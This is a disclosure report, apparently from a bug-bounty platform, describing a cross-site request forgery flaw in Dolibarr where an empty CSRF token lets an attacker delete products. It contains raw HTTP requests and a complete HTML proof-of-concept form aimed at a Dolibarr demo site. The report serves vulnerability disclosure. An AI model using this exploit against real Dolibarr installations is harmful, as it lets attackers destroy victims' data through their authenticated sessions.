Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr
Valid
Reported on
Jul 18th 2021
✍️ Description
Attacker can delete any Product for any user with CSRF vulnerability when the Admin or SuperAdmin or an authorized user click on PoC.html file, it is enough to attacker know the Product id on server.
I convert the
GET /product/card.php?id=3265&action=confirm_delete&confirm=yes&token=a8cba385ad68bb894b54ae522ed5bb78 HTTP/2
to this
GET /product/card.php?id=3266&action=confirm_delete&token=&confirm=yes HTTP/2
and then the CSRF token bypassed.
🕵️♂️ Proof of Concept
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.dolibarr.org/product/card.php">
<input type="hidden" name="id" value="3266" />
<input type="hidden" name="action" value="confirm_delete" />
<input type="hidden" name="token" value="" />
<input type="hidden" name="confirm" value="yes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
This vulnerability is capable of Delete any produt.
Occurrences
We have contacted a member of the
dolibarr
team and are waiting to hear back
2 years ago
to join this conversation